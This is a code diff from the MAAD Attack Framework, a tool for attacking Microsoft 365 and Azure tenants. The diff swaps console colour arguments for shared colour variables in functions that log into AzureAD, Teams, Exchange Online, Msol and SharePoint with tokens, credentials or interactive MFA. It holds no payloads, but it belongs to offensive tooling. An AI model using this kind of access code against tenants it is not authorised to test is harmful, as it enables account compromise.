                         Connect-AzureAD -ErrorAction Stop | Out-Null
-                        Write-Host "[.]Established access to AzureAD`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to AzureAD`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
                 if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             catch {
-                Write-Host "Failed to establish access to AzureAD. Validate credentials!`n" -ForegroundColor Red
+                Write-Host "Failed to establish access to AzureAD. Validate credentials!`n" @fg_red
             }
         }
     }
@@ -95,27 +95,27 @@ function AccessAzureAD{
         try {
             #Attempt basic authentication
             Connect-AzureAD -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-            Write-Host "[.]Established access to AzureAD`n" -ForegroundColor Yellow  
+            Write-Host "[.]Established access to AzureAD`n" @fg_yellow  
         }
         catch [Microsoft.Open.Azure.AD.CommonLibrary.AadAuthenticationFailedException]{
             #Check if account has MFA requirements for authentication
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-AzureAD -ErrorAction Stop | Out-Null
-                    Write-Host "[.]Established access to AzureAD`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to AzureAD`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                Write-Host "Invalid credentials!`n" @fg_red
             }
         }
         catch {
-            Write-Host "Failed to establish access to AzureAD. Validate credentials!`n" -ForegroundColor Red
+            Write-Host "Failed to establish access to AzureAD. Validate credentials!`n" @fg_red
         }
     }
 }
@@ -131,34 +131,34 @@ function AccessAzAccount {
         try {
         #Attempt token authentication  
         Connect-AzAccount -AccessToken $AccessToken -AccountId $AdminUsername -ErrorAction Stop | Out-Null
-        Write-Host "[.]Established access to Az`n" -ForegroundColor Yellow
+        Write-Host "[.]Established access to Az`n" @fg_yellow
         }
         catch {
             Write-Host "Token authentication failed. Attempting basic authentication now..."
             try {
                 #Attempt basic authentication
                 Connect-AzAccount -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-                Write-Host "[.]Established access to Az`n" -ForegroundColor Yellow
+                Write-Host "[.]Established access to Az`n" @fg_yellow
             }
             catch [Microsoft.Azure.Commands.Common.Exceptions.AzPSAuthenticationFailedException]{
                 #Check if account has MFA requirements for authentication
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-AzAccount -ErrorAction Stop | Out-Null
-                        Write-Host "[.]Established access to Az`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to Az`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n`n" @fg_red
                     }
                 }
                 if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                    Write-Host "Invalid credentials!`n`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n`n" @fg_red
                 }
             }
             catch {
-                Write-Host "Failed to establish access to Az. Validate credentials!`n" -ForegroundColor Red
+                Write-Host "Failed to establish access to Az. Validate credentials!`n" @fg_red
             }
         }
     }
@@ -166,28 +166,28 @@ function AccessAzAccount {
         try {
             #Attempt basic authentication
             Connect-AzAccount -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-            Write-Host "[.]Established access to Az`n" -ForegroundColor Yellow
+            Write-Host "[.]Established access to Az`n" @fg_yellow
         }
         catch [Microsoft.Azure.Commands.Common.Exceptions.AzPSAuthenticationFailedException]{
             #Check if account has MFA requirements for authentication
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-AzAccount -ErrorAction Stop | Out-Null
-                    Write-Host "[.]Established access to Az`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to Az`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n`n" @fg_red
                 }
             }
             if ($null -ne (Select-String -Pattern "invalid username or password`n" -InputObject $_.Exception.Message)) {
-                Write-Host "Invalid credentials!`n`n" -ForegroundColor Red
+                Write-Host "Invalid credentials!`n`n" @fg_red
             }
         }
         catch {
             $_
-            Write-Host "Failed to establish access to Az. Validate credentials!`n" -ForegroundColor Red
+            Write-Host "Failed to establish access to Az. Validate credentials!`n" @fg_red
         }
     }
 }
@@ -203,36 +203,36 @@ function AccessTeams {
         try {
         #Attempt token authentication  
         Connect-MicrosoftTeams -AadAccessToken $AccessToken -AccountId $AdminUsername -ErrorAction Stop | Out-Null
-        Write-Host "[.]Established access to Teams`n" -ForegroundColor Yellow
+        Write-Host "[.]Established access to Teams`n" @fg_yellow
         }
         catch {
             Write-Host "Token authentication failed. Attempting basic authentication now..."
             try {
                 #Attempt basic authentication
                 Connect-MicrosoftTeams -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-                Write-Host "[.]Established access to Teams`n" -ForegroundColor Yellow
+                Write-Host "[.]Established access to Teams`n" @fg_yellow
             }
             catch [System.AggregateException]{
                 #Check if account has MFA requirements for authentication
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.InnerException)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-MicrosoftTeams -ErrorAction Stop | Out-Null
-                        Write-Host "[.]Established access to Teams`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to Teams`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
                 if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                     $null = Read-Host "Exiting tool now!!!"
                     exit
                 }
             }
             catch {
-                Write-Host "Failed to establish access to AzureAD. Validate credentials!`n" -ForegroundColor Red
+                Write-Host "Failed to establish access to AzureAD. Validate credentials!`n" @fg_red
             }
         }
     }
@@ -240,29 +240,29 @@ function AccessTeams {
         try {
             #Attempt basic authentication
             Connect-MicrosoftTeams -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-            Write-Host "[.]Established access to Teams`n" -ForegroundColor Yellow  
+            Write-Host "[.]Established access to Teams`n" @fg_yellow  
         }
         catch [System.AggregateException]{
             #Check if account has MFA requirements for authentication
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.InnerException)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-MicrosoftTeams -ErrorAction Stop | Out-Null
-                    Write-Host "[.]Established access to Teams`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to Teams`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                Write-Host "Invalid credentials!`n" @fg_red
                 $null = Read-Host "Exiting tool now!!!"
                 exit
             }
         }
         catch {
-            Write-Host "Failed to establish access to Teams. Validate credentials!`n" -ForegroundColor Red
+            Write-Host "Failed to establish access to Teams. Validate credentials!`n" @fg_red
         }       
     }
 }
@@ -278,47 +278,47 @@ function AccessExchangeOnline {
         try {
         #Attempt token authentication  
         Connect-ExchangeOnline -AadAccessToken $AccessToken -AccountId $AdminUsername -ShowBanner:$false -ErrorAction Stop | Out-Null
-        Write-Host "[.]Established access to ExchangeOnline`n" -ForegroundColor Yellow
+        Write-Host "[.]Established access to ExchangeOnline`n" @fg_yellow
         }
         catch {
             Write-Host "Token authentication failed. Attempting basic authentication now..."
             try {
                 #Attempt basic authentication
                 Connect-ExchangeOnline -Credential $AdminCredential -WarningAction SilentlyContinue -ShowBanner:$false -ErrorAction Stop| Out-Null 
-                Write-Host "[.]Established access to ExchangeOnline`n" -ForegroundColor Yellow
+                Write-Host "[.]Established access to ExchangeOnline`n" @fg_yellow
             }
             catch [Microsoft.Identity.Client.MsalUiRequiredException]{
                 #Check if account has MFA requirements for authentication
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-ExchangeOnline -ErrorAction Stop -ShowBanner:$false | Out-Null
-                        Write-Host "[.]Established access to ExchangeOnline`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to ExchangeOnline`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
                 if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             catch [System.Exception]{
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.InnerException) -or $null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-ExchangeOnline -ErrorAction Stop -ShowBanner:$false | Out-Null
-                        Write-Host "[.]Established access to ExchangeOnline`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to ExchangeOnline`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
             }
             catch {
-                Write-Host "Failed to establish access to ExchangeOnline. Validate credentials!`n" -ForegroundColor Red
+                Write-Host "Failed to establish access to ExchangeOnline. Validate credentials!`n" @fg_red
             }
         }
     }
@@ -326,40 +326,40 @@ function AccessExchangeOnline {
         try {
             #Attempt basic authentication
             Connect-ExchangeOnline -Credential $AdminCredential -WarningAction SilentlyContinue -ShowBanner:$false -ErrorAction Stop | Out-Null 
-            Write-Host "[.]Established access to ExchangeOnline`n" -ForegroundColor Yellow  
+            Write-Host "[.]Established access to ExchangeOnline`n" @fg_yellow  
         }
         catch [Microsoft.Identity.Client.MsalUiRequiredException]{
             #Check if account has MFA requirements for authentication
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-ExchangeOnline -ErrorAction Stop -ShowBanner:$false | Out-Null
-                    Write-Host "[.]Established access to ExchangeOnline`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to ExchangeOnline`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                Write-Host "Invalid credentials!`n" @fg_red
             }
         }
         catch [System.Exception]{
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.InnerException) -or $null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-ExchangeOnline -ErrorAction Stop -ShowBanner:$false | Out-Null
-                    Write-Host "[.]Established access to ExchangeOnline`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to ExchangeOnline`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
         }
         catch {
-            Write-Host "Failed to establish access to ExchangeOnline. Validate credentials!`n" -ForegroundColor Red
+            Write-Host "Failed to establish access to ExchangeOnline. Validate credentials!`n" @fg_red
         }
     }
 }
@@ -375,34 +375,34 @@ function AccessMsol {
         try {
         #Attempt token authentication  
         Connect-MsolService -AdGraphAccessToken $AccessToken -ErrorAction Stop | Out-Null
-        Write-Host "[.]Established access to Msol`n" -ForegroundColor Yellow
+        Write-Host "[.]Established access to Msol`n" @fg_yellow
         }
         catch {
             Write-Host "Token authentication failed. Attempting basic authentication now..."
             try {
                 #Attempt basic authentication
                 Connect-MsolService -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-                Write-Host "[.]Established access to Msol" -ForegroundColor Yellow
+                Write-Host "[.]Established access to Msol" @fg_yellow
             }
             catch [Microsoft.Open.Azure.AD.CommonLibrary.AadAuthenticationFailedException]{
                 #Check if account has MFA requirements for authentication
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-MsolService -ErrorAction Stop | Out-Null
-                        Write-Host "[.]Established access to Msol`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to Msol`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
                 if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             catch {
-                Write-Host "Failed to establish access to Msol. Validate credentials!`n" -ForegroundColor Red
+                Write-Host "Failed to establish access to Msol. Validate credentials!`n" @fg_red
             }
         }
     }
@@ -410,27 +410,27 @@ function AccessMsol {
         try {
             #Attempt basic authentication
             Connect-MsolService -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-            Write-Host "[.]Established access to Msol`n" -ForegroundColor Yellow  
+            Write-Host "[.]Established access to Msol`n" @fg_yellow  
         }
         catch [Microsoft.Open.Azure.AD.CommonLibrary.AadAuthenticationFailedException]{
             #Check if account has MFA requirements for authentication
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-MsolService -ErrorAction Stop | Out-Null
-                    Write-Host "[.]Established access to Msol`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to Msol`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                Write-Host "Invalid credentials!`n" @fg_red
             }
         }
         catch {
-            Write-Host "Failed to establish access to Msol. Validate credentials!`n" -ForegroundColor Red
+            Write-Host "Failed to establish access to Msol. Validate credentials!`n" @fg_red
         }
     }
 }
@@ -442,7 +442,7 @@ function AccessSharepoint {
         $AccessToken
     )
     ###Connect Sharepoint
-    Write-Host "Attempting access to SharePoint..." -ForegroundColor Gray
+    Write-Host "Attempting access to SharePoint..." @fg_gray
     #$sharepoint_url = Read-Host -Prompt "Enter sharepoint url (or leave blank if you would like the tool to OSINT and find the url"
 
     #Find the sharepoint URL
@@ -464,47 +464,47 @@ function AccessSharepoint {
         try {
         #Attempt token authentication  
         Connect-PnPOnline -Url $sharepoint_url -AccessToken $AccessToken -ErrorAction Stop | Out-Null
-        Write-Host "[.]Established access to SharePoint`n" -ForegroundColor Yellow
+        Write-Host "[.]Established access to SharePoint`n" @fg_yellow
         }
         catch {
             Write-Host "Token authentication failed. Attempting basic authentication now..."
             try {
                 #Attempt basic authentication
                 Connect-PnPOnline -Url $sharepoint_url -Credentials $AdminCredential -ErrorAction Stop
-                Write-Host "[.]Established access to SharePoint`n" -ForegroundColor Yellow
+                Write-Host "[.]Established access to SharePoint`n" @fg_yellow
             }
             catch [Microsoft.Identity.Client.MsalUiRequiredException]{
                 #Check if account has MFA requirements for authentication
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-PnPOnline -Url $sharepoint_url -Interactive -ErrorAction Stop | Out-Null
-                        Write-Host "[.]Established access to SharePoint`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to SharePoint`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
                 if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             catch [System.Exception]{
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.InnerException) -or $null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-PnPOnline -Url $sharepoint_url -Interactive -ErrorAction Stop | Out-Null
-                        Write-Host "[.]Established access to SharePoint`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to SharePoint`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
             }
             catch {
-                Write-Host "Failed to establish access to SharePoint. Validate credentials!`n" -ForegroundColor Red
+                Write-Host "Failed to establish access to SharePoint. Validate credentials!`n" @fg_red
             }
         }
     }
@@ -512,23 +512,23 @@ function AccessSharepoint {
         try {
             #Attempt basic authentication
             Connect-PnPOnline -Url $sharepoint_url -Credentials $AdminCredential -ErrorAction Stop
-            Write-Host "[.]Established access to SharePoint`n" -ForegroundColor Yellow
+            Write-Host "[.]Established access to SharePoint`n" @fg_yellow
         }
         catch [Microsoft.Identity.Client.MsalUiRequiredException]{
             #Check if account has MFA requirements for authentication
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-PnPOnline -Url $sharepoint_url -Interactive -ErrorAction Stop | Out-Null
-                    Write-Host "[.]Established access to SharePoint`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to SharePoint`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                Write-Host "Invalid credentials!`n" @fg_red
             }
             else {
                 Write-Error "Failed to access Sharepoint. `n"
@@ -537,7 +537,7 @@ function AccessSharepoint {
                 Write-Host "Accessing sharepoint via powershell requires explicit consent to allow access to sharepoint."
                 $null = Read-Host "MAAD-AF will now launch an authorization page on your browser. Consent to the terms and hit authorize, then return here. press 'Enter' to launch the browser authorization page" 
                 Register-PnPManagementShellAccess
-                Write-Host "Note: If the browser does not launch automatically for some reason. Open your browser and use this URL to visit the authorization page `nURL: https://login.microsoftonline.com/$tenant/adminconsent?client_id=9bc3ab49-b65d-410a-85ad-de819febfddc `n" -ForegroundColor Gray
+                Write-Host "Note: If the browser does not launch automatically for some reason. Open your browser and use this URL to visit the authorization page `nURL: https://login.microsoftonline.com/$tenant/adminconsent?client_id=9bc3ab49-b65d-410a-85ad-de819febfddc `n" @fg_gray
                 
                 $user_prompt = Read-Host "Once you have completed the authorization in browser press 'Enter' to continue or type 'exit' to exit the module..." 
                 
@@ -548,19 +548,19 @@ function AccessSharepoint {
         }
         catch [System.Exception]{
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.InnerException) -or $null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-PnPOnline -Url $sharepoint_url -Interactive -ErrorAction Stop | Out-Null
-                    Write-Host "[.]Established access to SharePoint`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to SharePoint`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
         }
         catch {
-            Write-Host "Failed to establish access to SharePoint. Validate credentials!`n" -ForegroundColor Red
+            Write-Host "Failed to establish access to SharePoint. Validate credentials!`n" @fg_red
         }
     }
 }
@@ -578,34 +578,34 @@ function AccessSharepointAdmin {
         #Attempt token authentication  
         Connect-SPOService -Url "https://$global:sharepoint_tenant-admin.sharepoint.com" -AccessToken $AccessToken -ErrorAction Stop | Out-Null
         #SPOService currently does not support token auth so this is intended to fail and rollover to other auth methods
-        Write-Host "[.]Established access to SharePoint Online Administration Center`n" -ForegroundColor Yellow
+        Write-Host "[.]Established access to SharePoint Online Administration Center`n" @fg_yellow
         }
         catch {
             Write-Host "Token authentication failed. Attempting basic authentication now..."
             try {
                 #Attempt basic authentication
                 Connect-SPOService -Url "https://$global:sharepoint_tenant-admin.sharepoint.com" -Credential $AdminCredential -ErrorAction Stop
-                Write-Host "[.]Established access to SharePoint Online Administration Center`n" -ForegroundColor Yellow
+                Write-Host "[.]Established access to SharePoint Online Administration Center`n" @fg_yellow
             }
             catch [Microsoft.Online.SharePoint.PowerShell.AuthenticationException]{
                 #Check if account has MFA requirements for authentication
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
                         Connect-SPOService -Url "https://$global:sharepoint_tenant-admin.sharepoint.com" -ErrorAction Stop | Out-Null
-                        Write-Host "[.]Established access to SharePoint Online Administration Center`n" -ForegroundColor Yellow
+                        Write-Host "[.]Established access to SharePoint Online Administration Center`n" @fg_yellow
                     }
                     catch {
-                        Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                        Write-Host "Invalid credentials!`n" @fg_red
                     }
                 }
                 if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             catch {
-                Write-Host "Failed to establish access to SharePoint Online Administration Center. Validate credentials!`n" -ForegroundColor Red
+                Write-Host "Failed to establish access to SharePoint Online Administration Center. Validate credentials!`n" @fg_red
             }
         }
     }
@@ -613,27 +613,27 @@ function AccessSharepointAdmin {
         try {
             #Attempt basic authentication
             Connect-SPOService -Url "https://$global:sharepoint_tenant-admin.sharepoint.com" -Credential $AdminCredential -ErrorAction Stop
-            Write-Host "[.]Established access to SharePoint Online Administration Center`n" -ForegroundColor Yellow 
+            Write-Host "[.]Established access to SharePoint Online Administration Center`n" @fg_yellow 
         }
         catch [Microsoft.Online.SharePoint.PowerShell.AuthenticationException]{
             #Check if account has MFA requirements for authentication
             if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                 try {
                     #Attempt interactive authentication  
                     Connect-SPOService -Url "https://$global:sharepoint_tenant-admin.sharepoint.com" -ErrorAction Stop | Out-Null
-                    Write-Host "[.]Established access to SharePoint Online Administration Center`n" -ForegroundColor Yellow
+                    Write-Host "[.]Established access to SharePoint Online Administration Center`n" @fg_yellow
                 }
                 catch {
-                    Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                    Write-Host "Invalid credentials!`n" @fg_red
                 }
             }
             if ($null -ne (Select-String -Pattern "invalid username or password" -InputObject $_.Exception.Message)) {
-                Write-Host "Invalid credentials!`n" -ForegroundColor Red
+                Write-Host "Invalid credentials!`n" @fg_red
             }
         }
         catch {
-            Write-Host "Failed to establish access to SharePoint Online Administration Center. Validate credentials!`n" -ForegroundColor Red
+            Write-Host "Failed to establish access to SharePoint Online Administration Center. Validate credentials!`n" @fg_red
         }
     }
 }

--- a/Library/LaunchExploitMode.ps1
+++ b/Library/LaunchExploitMode.ps1
@@ -14,7 +14,7 @@ function LaunchExploitMode {
             $detection_choice = ($option_list.$detection_user_choice)
 
             if ($detection_user_choice -ne 0 -and $detection_user_choice -in $option_list.Keys) {
-                Write-Host "`nExecuting: $detection_choice" -ForegroundColor Yellow -BackgroundColor Black
+                Write-Host "`nExecuting: $detection_choice" @fg_yellow @bg_black
             }
         }
         catch {

--- a/Library/MAADInitialization.ps1
+++ b/Library/MAADInitialization.ps1
@@ -12,8 +12,8 @@ $Global:MAAD_AF= @"
 
 function MAADInitialization {
 $host.UI.RawUI.WindowTitle = "MAAD Attack Framework"
-Write-Host $Global:MAAD_AF -ForegroundColor Yellow
-Write-Host "                                            Created by Arpan Sarkar (@openrec0n)`n" -ForegroundColor Gray
+Write-Host $Global:MAAD_AF @fg_yellow
+Write-Host "                                            Created by Arpan Sarkar (@openrec0n)`n" @fg_gray
 
 #Initiation disclaimer
 Write-Host "                                              Welcome to MAAD Attack Framework`n                                 Attack Tool for simple, fast & effective security testing`n" 

--- a/Library/MAAD_Colors.ps1
+++ b/Library/MAAD_Colors.ps1
@@ -1,0 +1,43 @@
+### Color definitions.
+### These can be referenced where color formatting is desired.  
+###
+### Instead of:
+### Write-Host "Lorem ipsum" -ForegroundColor Yellow -BackgroundColor Black
+###
+### Use instead:
+### Write-Host "Lorem ipsum" @fg_yellow @bg_black
+###
+
+# Foreground colors
+$fg_black = @{ ForegroundColor = "Black" }
+$fg_blue = @{ ForegroundColor = "Blue" }
+$fg_darkblue = @{ ForegroundColor = "DarkBlue" }
+$fg_cyan = @{ ForegroundColor = "Cyan" }
+$fg_darkcyan = @{ ForegroundColor = "DarkCyan" }
+$fg_green = @{ ForegroundColor = "Green" }
+$fg_darkgreen = @{ ForegroundColor = "DarkGreen" }
+$fg_gray = @{ ForegroundColor = "Gray" }
+$fg_darkgray = @{ ForegroundColor = "DarkGray" }
+$fg_magenta = @{ ForegroundColor = "Magenta" }
